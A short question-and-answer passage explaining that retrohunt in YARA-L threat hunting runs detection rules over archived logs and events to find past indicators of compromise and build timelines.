In threat hunting with YARA-L, what is retrohunt used for?

Retrohunt is the function that lets you search historical telemetry for YARA-L rules across a specified time range. It enables you to look back through stored data to find past matches to your indicators of compromise, uncovering earlier infections, persistence, or campaign activity that wasn’t visible in real time. You define YARA-L rules representing artifacts or behaviors, and retrohunt scans the archived logs and events across the chosen time window and sources, returning hits with timestamps, hosts, and other context. This approach is essential for building timelines and spotting long-tail activity, rather than querying only current live data or generating a real-time alert feed.